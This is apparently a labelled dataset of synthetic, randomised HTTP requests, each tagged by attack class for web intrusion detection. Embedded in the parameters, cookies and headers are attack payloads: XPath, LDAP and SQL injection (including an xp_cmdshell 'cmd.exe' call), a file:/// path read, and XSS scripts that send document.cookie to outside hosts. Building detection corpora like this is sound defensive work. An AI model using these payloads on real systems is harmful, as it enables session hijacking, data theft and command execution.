Max-Forwards: 3
Pragma: 2=eihht
Proxy-Authorization: NTLM c3J4bHplcmFOcnd2bzluZXJlQ1Jpc2FuaXNzaXVodWV0bm9xOXJzZ2RuNGJ3
Authorization: Basic d25Jcm46ZWlkY3ZM
Referer: http://www.dlnhmC8e.be/Cyr4cd/8thedd.jpg
TE: trailers,gzip
User-Agent: htzeAa/3.6.7.1
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 062x6317
Transfer-Encoding: compress
Upgrade: ovle/8.4, aroHm/4.2
Warning: 897 250.38.91.23:5 "auyT" "Wed, 26 Oct 05 13:46:39 UTC"
X-Forwarded-For: 216.246.247.139
~~~~~: ~~~~~~~~~~~~

null

End - Id: 39130
Start - Id: 49488
class: XPathInjection
GET /en7nhoc4oerremf/nzp/rnfayRHnadn/aXgf0dQhIreWuwTA0l4/T4oRwboot.iniK-2ldj/nowMuareE1asnnxEEnns/hlI5LDgGdYgES5i5xi0b/pLqTjA/ZdeleteILx/hhc_.asp?8iriyl6gra2e3=607475&XGeOoptV4rVMl=5rc&etie3nl=cOof8i&Dud=749&sf3rhityiP=%3AGNydtmtos&ieawea1soygi=ontz&bhanse5tPbEhO7=0jeco&k1QYchild1GWZ=6611845822&OujrmR7=2849&gsorh15i16s=isansnpa&k2ldlwetl3eeWc=tmpxuye&ttd6nlpaN=oyyw&91K1E0T9=Hj+tr%3Cdttth%29lOn3m&sueeelte=r93%27%5D+++++%7C+++++P++++%7C+++%2F%2Fuser%5B+++name%2Ftext%28%29++++%3D+++%27edmej HTTP/1.1
Host: 152.32.3.137
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 243.204.148.120
Cookie: ee4=3;UYa4DUekur1=421204255;etnHole3uoemo=27206546
Cookie2: $Version="467"
Date: Wed, 08 Feb 06 05:15:43 CET
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: zimlrze=7x4eo
From: sryguohs@efdmr.biz
If-Modified-Since: Mon, 30 Nov 09 22:46:00 GMT
If-Unmodified-Since: Sun, 16 Jan 05 16:32:22 GMT
If-Match: *
If-None-Match: "WUznIkBAx-Ym0liD6wgx"
If-Range: *
Max-Forwards: 4696
MIME-Version: 4.4
Pragma: das2eea='eht'
Proxy-Authorization: NTLM bGlvb2Vzc2Flc3Rvb3Flb3Rvcm5zZTRqZXhpc2hsZGliaXVhZ2h0aQ==
Authorization: NTLM Y0llbXRldEpvem1nMHRhYXFoZTdIc3hwYWd6ZXd1dzFzb2lzb3RzRQ==
Range: -012
Referer: http://chy44l.fr/ipe6ut0/aocpdeet/6s2lga/strrt4.ace
TE: trailers,chunked,trailers
Trailer: Authorization
User-Agent: yhegptoebt (8Oul.g-CBP; gkoiD@bEhh; svG2o4; s_G5th)
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: FTP/6.6 221.185.154.74, HTTP/2.7 46.208.240.221
Transfer-Encoding: identity
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 029 152.191.219.235 "iowd" 
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49488
Start - Id: 49044
class: XPathInjection
GET /1323omonttkivsp/FIE/ri6eioieem4Fnoo/jM/irRr/haDYDvBkOedB1Ba-l/7tNlaohlttfh/1obmArch/wlni26kS3ghptbteik7g/gdaoeol.jpeg?5telnetm9mandd@sv.K=rs%27++or++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28++++i++%2B+++j++%2B++k%2B+l++++%2B++++1%29%5D+%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++%27onqne%27%3D+++%27++erin%27++or&x0nommnsn9lOP=e9K&5cemlrdeqy=uga6tcnyh&L7tiqrtJs=+ HTTP/1.1
Host: 167.83.94.253
Connection: keep-alive
Accept: image/*;q=0.0, text/plain;q=0.6
Accept-Charset: cp-950;q=0.0
Accept-Encoding: compress, identity;q=0.5, deflate
Accept-Language: *;q=0.4
Cache-Control: max-age=282
Client-ip: 23.215.109.9
Cookie: 4en=9;usLWT9=e;nivb=tRjDbYdQTAc;fotahmoe=esdrssY;Qnsm=67158
Cookie2: $Version="182"
Date: Mon, 05 Dec 05 03:02:02 GMT
ETag: "r-Z6weivO3zk7qcN"
Expect: oatrmt=Wctate;wmnin=mhlrmayt
From: omlrams@dneneIeea.de
If-Modified-Since: Sun, 25 Oct 09 07:43:06 GMT
If-Unmodified-Since: Sat, 12 Aug 06 21:06:16 CET
If-Match: "ILl1IhokyDW1cPI"
If-None-Match: "fxauJTjPJedHzYc"
If-Range: Tue, 23 Jun 09 05:26:09 CET
Max-Forwards: 6
MIME-Version: 9.3
Pragma: e=ei
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: -31
Referer: http://9blrc.net/Aeimoli/Scndns/etoe/hemesFi.txt
TE: deflate,gzip
Trailer: Referer
User-Agent: Mozilla/9.4 (X11; U; Unix 1.6; bj-ee; rv:5.3.9) Gecko/09370819
UA-CPU: StrongARM
UA-Disp: 792,0293,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1840x9062
Via: HTTP/5.3 www.tpreaxd6.css, FTP/6.0 www.vo51hnn.jpg
Transfer-Encoding: compress
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 688 135.98.248.226 "d8an8" 
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49044
Start - Id: 48989
class: XPathInjection
GET /HM/jKQfhGOHNL_uC8.p6/nsipbrled/e4me6elrhiAnttttt/Wobjectr/n_6K2ryjFjwdnTC4NvAI/tHX2TSZeE6iEXgDkjiW/wM2.mspx?uepdd=907542&reogtheq=o&derrnsS6rGtnEt=140262&g3-4R=3898+or++++e%2Faim%2Fttd8%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D+or+0%3D&grpgooseyso1ld=8773971536&2xJhODq=d&aethodilt=oeE%3B%5Ct2t%3C7Ppec&oe8=tUi%3Bin%3A HTTP/1.0
Host: www.ndhritrhe.com
Connection: close
Accept: image/gif, text/*;q=0.5, audio/*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: aytpe8-sWttnvo
Cache-Control: max-stale
Client-ip: 102.111.118.138
Cookie: qvPCG=5NuGP;usrNDlGgKD=tlCF_SBw6mG;dsaourj=886;6t4Tooleatrih=21187796;ecam=std+;0oEf9a9wnQsH3ar=lee-
Cookie2: $Version="6"
Date: Fri, 02 Feb 07 11:44:55 GMT
ETag: "L18TtWv_HO4fi5oihf"
Expect: 100-continue
From: rdd7Hew6@nxilnib.gov
If-Modified-Since: Sun, 29 Aug 04 08:59:11 CET
If-Unmodified-Since: Fri, 14 Mar 08 22:01:14 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6230
MIME-Version: 7.4
Pragma: h='egn8to'
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: Digest opaque="tfbSexsr"
Range: 23-,057-,45-
Referer: /CotJab/yej7hpe3/eecnOtt/oaaTewm.swf
TE: trailers,gzip,gzip
Trailer: From
User-Agent: dWeIbpSLe http://www.NHr3mhe.net
UA-CPU: 68000
UA-Disp: 8493,346,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6996x6974
Via: 0.4 207.203.251.141, HTTP/8.4 www.aukd.jpg
Transfer-Encoding: compress
Upgrade: aivsar/6.5, Aensn/2.2
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48989
Start - Id: 46578
class: XSS
GET /cezdimzWsetzt/shtroe/tCKTHqwvM/n3Lwe9agj..b/iE8.MVbHbLRTbxi/iRY8xbwualEWaK/eRqIW/etuv_cLY2THVX@RE.dll?Cyatposrmizru=ishDenmhrW&zaECthimq3rgtbc=o38z&3x=6730&qezthreb2=arexx&dmc7e=tWqP&hog7hehte=1398465&uWfK0F2nYk=347559 HTTP/1.0
Host: 125.204.9.61
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.9
Cache-Control: max-age=876
Client-ip: 140.154.179.232
Cookie: mhtTco5ernti=eYQFQK@_K-1
Cookie2: $Version="41"
Date: Fri, 07 Jan 05 04:55:56 GMT
ETag: W/"nhdQBR1x85E8WdN"
Expect: 100-continue
If-Modified-Since: Fri, 24 Apr 09 06:47:20 CET
If-Unmodified-Since: Thu, 17 May 07 11:36:20 CET
If-Match: *
If-None-Match: *
If-Range: "3pMDtKlKuAiiEWzubX2"
Max-Forwards: 58
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM M2VhU3NBb25hOWZoZ2lub2NiZXQxUm50YXRzdHRUbm9lb3NtUm4=
Authorization: Basic bjNpczhyOmhFZWxnb0g=
Range: 70-
Referer: /e5we/reEA/grlnuiv.sh
TE: trailers,deflate;q=0.4
Trailer: Expect
User-Agent: <object     classid    =   "clsid:... "    codebase=   "   javascript:   [document.location.replace ('http://www.ieaslans.com/cgi-bin/ieonistana.cgi'+document.cookie);] " >
UA-CPU: PowerPC
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5605x1554
Via: 0.2 235.45.121.98, HTTP/8.9 www.NeWl.tiff
Transfer-Encoding: rnie; nrnuh8e=arSTaneA
Upgrade: teocua/2.1, aao5/0.7, onnw/4.6, 3ioRA/4.3, tmed0W/6.5
Warning: 683 www.gcldtee.png:8 "A0eloittu6eieos" "Mon, 29 Aug 05 12:19:45 GMT"
X-Forwarded-For: 222.189.31.195
X-Serial-Number: 70953324571970
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46578
Start - Id: 37428
class: LdapInjection
GET /haoe/am7ziaitin7shorj/Lh0MTNg.HMPNn/xG@xR@gR2zG/eHGFW7U/UGmqpds/aalcypdu.tiff?kiN=oDeNs5&jaihrT=aRet HTTP/1.0
Host: www.a2haeq3.uk
Connection: close
Accept: */*
Accept-Charset: utf-7
Accept-Encoding: compress, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 64.185.2.1
Cookie: dmAtzsreeHn=49067;nV=202133582;ejyyec2i='perl;craaesrqeNE=777;htss=su)( |(4oTr=*);b0t=gX
Cookie2: $Version="88"
Date: Sun, 08 Jul 07 14:03:04 CET
ETag: "9SrTJODo@H59_2O4RH"
Expect: 100-continue
From: ieadRy@PuCsrrese.ch
If-Modified-Since: Thu, 14 May 09 15:14:07 CET
If-Unmodified-Since: Mon, 23 Apr 07 05:31:55 UTC
If-Match: "w0ZYBMk76Aqu52m"
If-None-Match: *
If-Range: Sat, 27 May 06 01:18:02 GMT
Max-Forwards: 9
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic ZnNybE86b3NzcmRl
Authorization: Basic enY1aTppaGhzaHE=
Range: 7-824579
Referer: http://b2be.st/e0i8eg/e2nrlel/rnhoa.pdf
TE: deflate;q=0.0,trailers
Trailer: Expect
User-Agent: Linntae
UA-CPU: 68000
UA-Disp: 1171,1372,32
UA-OS: Windows NT
Via: FTP/9.5 www.eaabu.tiff, 3.3 100.191.22.20:5862
Transfer-Encoding: compress
Upgrade: tNlTm/0.9, cta8T/8.8, wwlEn/3.1, o9lne9/1.6, 2ee4Ai/5.8
Warning: 631 www.iErtre.shtml "1kti" 
X-Forwarded-For: 89.11.66.103
X-Serial-Number: 72751646141321636883
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37428
Start - Id: 48053
class: XSS
GET /retNotiwa/jV7U59SsldRBx/esESitny.jpeg?drsunRoHiLiaebr=mnYe&tk=javascript%3Aalert+%28+%226.Oe%22%29&lejmitx0=57&bi5Ortoer=jpntperlsrl&ew=en HTTP/1.1
Host: 189.33.47.209:82701
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean;q=0.2, x-mac-roman;q=0.9, windows-1252
Accept-Encoding: *
Accept-Language: n-gaI;q=0.8
Cache-Control: max-stale
Client-ip: 53.78.113.149
Cookie: sleiecTm3d=2015722541;raiia=teiteoa;tgtutls=mpBNpohavctsos
Cookie2: $Version="1"
Date: Tue, 18 Jul 06 09:12:50 UTC
ETag: W/"oUy6u7s.QlnBwlHHu"
Expect: anmte=7mtotl;taCmh=mwueaUo
From: agsv@hn76ev.st
If-Modified-Since: Fri, 19 Jun 09 11:15:13 UTC
If-Unmodified-Since: Sun, 05 Jun 05 21:32:00 GMT
If-Match: "5-WC9.pKi3PmZ_j"
If-None-Match: *
If-Range: Wed, 26 Mar 08 20:16:03 GMT
Max-Forwards: 9119
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: eofH ewreea=Anton
Authorization: nrsO grats=oecceisw
Range: 16-601
Referer: /NigseyeS/RbIsttns/ftnbddw/Tmna/olbe.php
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.8 (X11; U; Open BSD i386 1.4; u1-ve; rv:3.4.6) Gecko/74071292
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6153x685
Via: 1.0 www.wreqh.htm, FTP/7.4 www.dj80.js
Transfer-Encoding: gzip
Upgrade: ohr/0.8, dird/9.6, ccspda/7.4, eaonS/0.7, xbT1yr/6.0
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 142.37.94.150
X-Serial-Number: 405569074263988888
----: -----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48053
Start - Id: 35041
class: SqlInjection
GET /nyMY3v4.-Kf2YqS.zZ/jr@m/n-B/oG3/1neywzs/nUmRnTIar/sZkmX6Qg-1qICf/cVQ46NS_frt/iUO8j.jpg?NntnssEeWlsi4C=w%3Bl&tsna=%2B+Sgroup+byckdn+amtaxml%40%5Crs9tmp&ceTpivitavst7=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe&nseatn7Ne=ctmp&nO5nTtaIN=dI42zNZ&wqchh2tiSrdHor=444944898&Nh8ut2=h1%7E-teta&wrc=idy%29u&teai9tl=sa&btp=y HTTP/1.0
Host: www.piht.st
Connection: close
Accept: */*;q=0.3
Accept-Charset: windows-1257, iso-8859-5;q=0.0, x-mac-cyrillic, shift_jis, windows-1250;q=0.9
Accept-Encoding: gzip, gzip;q=0.1, deflate, gzip;q=0.7
Accept-Language: yut9a3n-i, e-eeanIorh;q=0.2, j-tdxftsst;q=0.5
Cache-Control: only-if-cached
Client-ip: 175.67.198.190
Cookie: tbsn=8426;usrnc0Yobject=a0;sesonooawaqe=836;5e2nfANemans1s=tf8TamL7CV5;rwrt=7
Date: Mon, 31 May 04 11:16:16 CET
ETag: W/"0@NBRWxhqqgere4xA"
Expect: 100-continue
If-Modified-Since: Thu, 10 Aug 06 08:43:56 GMT
If-Unmodified-Since: Tue, 18 Nov 08 15:36:30 CET
If-Match: "8Zn6mowOzKX6RPdh4VTh"
If-None-Match: "roFLr8FqhDW.T0n1tCk"
If-Range: *
Max-Forwards: 86
MIME-Version: 1.5
Pragma: no-cache
Authorization: Basic ZWJycW5uOmVlYmlZa3Q=
Range: 032643-
Referer: /ehlz9aty.js
TE: trailers
User-Agent: wiwtip (x4gy6Jx-3P; m@jAD9D.HZ)
UA-CPU: PowerPC
UA-Color: color8
Via: 6.4 www.nacffhNz.htm:6
Transfer-Encoding: bn6tsc; Eieotn0k=oxswj
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35041
Start - Id: 38616
class: LdapInjection
GET /jFmt-YWRGM/4L_DxcmdSvTconnecty6bHc/amit8pc2hb/mVbxOsh2NBZ/engLhenrU4rh/cpcvrezc/uoeenc/es9xm_DBR.html?bRyCd=euiho+yt++i&s3oSe2TrA=92050667&voe5a8dE5oh=%29+++%28+++%7C+++%28++cn%3D*o++++%27brien*+%29%28mail+%3D*o+%27brien*+++%29+++&reouc4=t%25ses%28pnch&uMWMLmeta@Gg0Q8=eugsyuvent&EirKM0akLSB5=%40ot&iaaiye8fttlmsa=tnkLrssmhas&_replacecathlJ-=ns HTTP/1.1
Host: www.4xeucoiab7.net:69
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: compress, compress
Accept-Language: s-si
Cache-Control: max-age=8
Client-ip: 54.188.209.237
Cookie: C6H0is=aLEiexectt/prLctmp;ve2mto=3a;tei3Y3mcms=t3etn0icpg;jc98odu=r0o-kt8nw8likeinnacE
Cookie2: $Version="90"
Date: Sun, 31 Jan 10 01:10:28 UTC
ETag: W/"78VQV6Gzdd4iSe."
Expect: 100-continue
From: RwOaaelp@gdhst.com
If-Modified-Since: Sat, 09 Feb 08 21:05:11 GMT
If-Unmodified-Since: Wed, 06 Apr 05 20:29:20 UTC
If-Match: "CFb1gS@mVaEbPOH"
If-None-Match: "sjSn5qbZ3i5NKpNA"
If-Range: "2nrs__Eu2QeAlWIfe7Y"
Max-Forwards: 0132
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: NTLM ZGk5aGVhQXRzdGRjZXlBaWd0ZXB0bzhuMG1ib3NvbnA2bG5h
Range: 863-0,-075,-8921
Referer: /xptge/nRazrIms/lEdosTen.doc
TE: chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.8 (X11; U; Open BSD i586 2.3; rt-lt; rv:3.5.2) Gecko/18008974
UA-CPU: x86
UA-Disp: 7529,000,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5976x789
Via: 3.0 www.lntsudh.jpeg, FTP/4.1 8.52.254.109, 6.5 www.6egGeA.gif
Transfer-Encoding: identity
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 221 www.yahrm.jpeg "dsaeopr0wq2uo" "Thu, 14 Jul 05 01:23:19 CET"
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38616
Start - Id: 44972
class: PathTransversal
GET /uBRelRAOU4edhMYX/LyQr/p2Obb6gsam1M/5cdsestjnrl0eeDelO/tR.msf?otelnetag7kuudGetcT=vua%7C&rqdeIoifeycuts=triframels&aoelyt=Hb%26eeDhTgtre&iefdheud=file%3A%2F%2F%2F8%3A%2Fd3SUU%2FnnH%2Foaimrrn.xml HTTP/1.0
Host: www.stsraeaC.uk
Connection: tlapa
Accept: image/*, application/*;q=0.1, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lletm0Ih-deser;q=0.1
Cache-Control: max-stale
Client-ip: 81.141.204.248
Cookie: qlemkone=001286
Cookie2: $Version="54"
Date: Wed, 16 Dec 09 24:06:38 CET
ETag: "NFwIQBsA9AL9_999R"
Expect: awgewyl
From: 3srmpro4@bnhd9wr.de
If-Modified-Since: Fri, 21 Oct 05 02:31:43 CET
If-Unmodified-Since: Mon, 25 Oct 04 06:00:42 UTC
If-Match: "n4oc7@zUkeJBDToZ2"
If-None-Match: *
If-Range: Thu, 08 Sep 05 12:13:08 UTC
Max-Forwards: 3653
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic bGRBYWg6emllYg==
Authorization: NTLM bGltYXgwZW9laTBoc3NybVRoYWVzZHNhc3NsdDhvZEhlYWt0ZmRkaXRkZXhk
Range: -972278
Referer: http://www.e7nwe.uk/rcn4n2tw/btrv.gif
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/3.9 (compatible; Konqueror/0.5; Linux i586; l4pdn; sngeijl)
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: FTP/4.0 197.14.21.17
Transfer-Encoding: identity
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 367 181.6.7.177:7 "oiegnotboa" 
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 941903
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44972
Start - Id: 47383
class: XSS
GET /RACu9rM/Acmd_2j9@/ixybX3.34d8/o1eoerie1oethEn8Evs/iTJU/8Imzn/t1LPxgbPw9HyKe-VZeUB/or6Mstoto5ieae/7Bs@Kz8ojo3V.WF95gMV/nRT8LXBgkXajF2/eairentaa/mTP4@J6Tw.swf?u5io=%3Cxml+id++%3D+%22X+++%22+++%3E%3Ca%3E%3Cb++%3E%26lt%3Bscript%3E%5Bwindow.open%28%27http%3A%2F%2F155.236.12.33%2Farng.asp%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript%3E%3B%3C%2Fb++%3E%3C%2Fa+%3E%3C%2Fxml++%3E HTTP/1.0
Host: www.cb9HgselA.it
Connection: keep-alive
Accept: video/mpeg;q=0.8, audio/*
Accept-Charset: euc-jp;q=0.6, iso-10646-ucs-2;q=0.9, iso-8859-6;q=0.0, iso-8859-8-i;q=0.2, iso-8859-4
Accept-Encoding: deflate;q=0.6, compress;q=0.6, identity;q=0.8
Accept-Language: *;q=0.0
Cache-Control: min-fresh=80
Client-ip: 50.84.88.200
Cookie: tr2eixtciyd=626116851;z74fnatusaAucA8=hsssystemstdinst7n4i9wp-isPdocument&nwindow.open;yn=t ?;zatehntri=7jtou8oaeUofa5
Cookie2: $Version="936"
Date: Sat, 05 Jul 08 07:28:46 GMT
ETag: W/"eK9JG65XxM2Bk-Ko"
Expect: 100-continue
From: dhMEe9le@RpqtlrdwLb.be
If-Modified-Since: Wed, 17 Aug 05 20:49:32 GMT
If-Unmodified-Since: Fri, 23 Jan 09 06:33:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 92
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: Basic aXBucmM6ZXNhY3U=
Range: 35419-,75138-2674,165640-
Referer: http://www.oll3owm.fr/etoteBod/oduo4I/sidrd5b8/kelott/ait63n.bin
TE: trailers,deflate;q=0.9
Trailer: Accept-Charset
User-Agent: Mozilla/5.6 (Windows; U; WinNT 2.8; at-me; rv:4.3.3) Gecko/73949378
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 605x5902
Via: 0.0 240.221.188.123, HTTP/0.4 www.eYEtzha.jpg:8, 4.3 www.ivo4he.css
Transfer-Encoding: deflate
Upgrade: vihit/6.1, e9om/9.5, eo8qd/9.3
Warning: 630 69.99.208.229 "aypepysetwq" "Mon, 12 Apr 04 06:01:50 CET"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 71254341199
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47383
Start - Id: 37709
class: LdapInjection
POST /oiYa/wrnHehuyia.jpg? HTTP/1.0
Content-Length: 332
Content-Language: 3nee0,0hnwaT82
Content-Encoding: gzip
Content-Location: /vcst/xroc.jsp
Content-MD5: c3JoYmg3ZWVvaXRybmVlcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 17 Feb 08 08:47:11 CET
Last-Modified: Tue, 29 Sep 09 04:35:16 GMT
Host: 13.0.185.45
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.1, deflate, gzip;q=0.5, compress
Accept-Language: ttweifzi-abh;q=0.5, da-aU3an
Cache-Control: no-transform
Client-ip: 119.62.22.77
Cookie: daestreLitiv=q;Eo=mhneIeaser;snoteeeprngtBw=4o5aa7gvtaneeleo
Cookie2: $Version="321"
Date: Sat, 16 Apr 05 02:27:20 GMT
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: 100-continue
If-Modified-Since: Wed, 25 Oct 06 05:51:16 UTC
If-Unmodified-Since: Mon, 04 Oct 04 15:56:13 UTC
If-Match: *
If-None-Match: "bU@@f.t0ewrBy71_H"
If-Range: "DZ70iyTX.ylRK0e9Dy8t"
Max-Forwards: 9786
Pragma: NiDeei='q00d'
Authorization: eyyd nnfs=udsi
Referer: http://eodeod.fr/M1br/2hh8/itstNte3.tiff
TE: trailers,trailers
User-Agent: Mozilla/4.6 (Machintosh; U; PPC Mac OS X 7.9; uo-us; rv:8.0.2) Gecko/95376245
UA-CPU: MIPS
UA-Color: color16
UA-Pixels: 8766x859
Via: ltpd/2.1 228.122.131.86:78
Transfer-Encoding: identity
X-Forwarded-For: 34.122.30.225

Hnce7OvsmAe7ah=taecxmlx&nessobbhJddr6=-&hdmanietPuts=1186262692&gr=sezndoissetts&ehnHc3=")(targetfilter=(o=NetscapeRoot))&haO=bhecas%unl7iframeSsrics&ialinHnbe=aeana2u1m4seqc9e&oclwnebehttooy=4453951208&Ei.m43W5=6332482&qsg0=544579&u7awaf0d=uaegIesithssuw&shra=crAycDej&.IjJ=fxT-luTUh_Xk&eeooqfeoee=unyseeoebaNpret

End - Id: 37709
Start - Id: 49644
class: XPathInjection
GET /eyGGTlCViHa/.RwCfSlpXtx6/rSuAD94pUgqo/hrFknatar/ezsBVDiAfXQOSU8.php?vclwc=scrsaoatq9emteyn&VexecreplaceSLSAbmCo=4&bmtJaccess_logf=hATq&ue0apdOOtoUwrs=5439321228&sochyedticnmd=epormstoO&cwl9t313tazDhw=389&jegM4=ya0uK0Lt5vAi&RnornnwAN=s6gRdstQt&meqeteeki=bpsW&3undi5rsmlhadO=n04&u1nsttdEaie8=rJD5crtaK&ZSg2-p=t%2F1n%2FnX%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D45%5D++++or+++%27OVih%27++%3D++%27 HTTP/1.1
Host: www.tsoaRwa2.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, compress;q=0.5, compress, identity;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 18.132.255.142
Cookie: 8FlI=217600;stik0h50ohonl=yooonMkdVa;tua=8
Date: Thu, 27 Apr 06 23:17:20 UTC
ETag: "N6bqFN-@jrPmqq@GH"
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Mon, 10 Jul 06 02:16:17 UTC
If-Unmodified-Since: Sun, 26 Sep 04 07:25:34 UTC
If-Match: "z1epBmyufILgw7LQ"
If-None-Match: "Rx8FF1UAXjy0sS-"
If-Range: Sun, 02 Dec 07 06:42:23 CET
Max-Forwards: 5921
MIME-Version: 7.8
Pragma: toS=teenfHn
Proxy-Authorization: NTLM ZXR4Y2FuZmVyZ2lzdUVlbnRzYUJIZWdqWmhua2VwZTFlZXNt
Authorization: Basic ZTZ0aDppZnVt
Referer: /atenealc/aAobi/saneftet/T7gnge.html
TE: trailers,gzip;q=0.6
User-Agent: Mozilla/1.2 (X11; U; SunOS sun4u 0.5; oi-re; rv:5.5.4) Gecko/55180576
Via: dvno/1.0 86.196.236.183:4835, 7.5 www.lFfj2wd.gif:95150, 1.7 www.xocUi.html
Transfer-Encoding: identity
Upgrade: d5det/1.1
X-Forwarded-For: 163.247.165.107
X-Serial-Number: 460757969488
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49644
Start - Id: 42623
class: SqlInjection
GET /98httpsPJm4k/lnorbhioi43A/eden5Orchtigened/t3ZJ.YxJGOo@WsJ1/leonnnReetnTnmerls/ktnrmma/hFQZ-ykF@7.@rj48Dtx_/6ir/ebsms.cgi?mtueg=mcIR%40hkNrB76&elhinrtea=%27++++OR+%27tN%27++LIKE+%27aze%2525&pxbal=Sphzratlmhsmailibnhn&ylsJrXd3cnnyE=802589519&lfhhtetrh6seleo=2496243&aeids3=%29tde+t%3C&CDhuhl2new4mett=03136532&depbf=dupdate0&aAweq=hsetwvarlibusycp%3B&Vj4azpeaueuPme=iet9rrafabr&Cotfnh9=3as6p&seO=8989631&gsM8eytnu7=6532&pbssdsgiAewe=Tmabohavingvlinclude HTTP/1.1
Host: 57.129.243.186
Connection: close
Accept: image/*
Accept-Charset: iso-10646-ucs-2, iso-8859-9;q=0.2, koi8;q=0.8, windows-1252;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: e-pmloionl, siem-uio;q=0.5
Cache-Control: max-age=46
Client-ip: 77.228.182.15
Cookie: wQTx9gl7=0sg&eoe =vdoeh0Udiv0;-dXwp-c8FEE=1n6s0Lg;al5e= twli
Cookie2: $Version="78"
Date: Sun, 14 Dec 08 12:52:57 GMT
ETag: W/"6g2CgBxyxaxVfRuImC"
Expect: 100-continue
From: auoiBfre@itih.st
If-Modified-Since: Mon, 25 Jul 05 16:03:36 UTC
If-Unmodified-Since: Fri, 23 Jan 04 21:56:38 GMT
If-Match: *
If-None-Match: *
If-Range: "k_s3mn@WlgTRkLRoAi_"
Max-Forwards: 21
MIME-Version: 1.2
Pragma: nx='q'
Proxy-Authorization: Saen 6ahrcn=dstav
Authorization: ayhmi3 v0E7E=cnmi
Range: 72326-9838
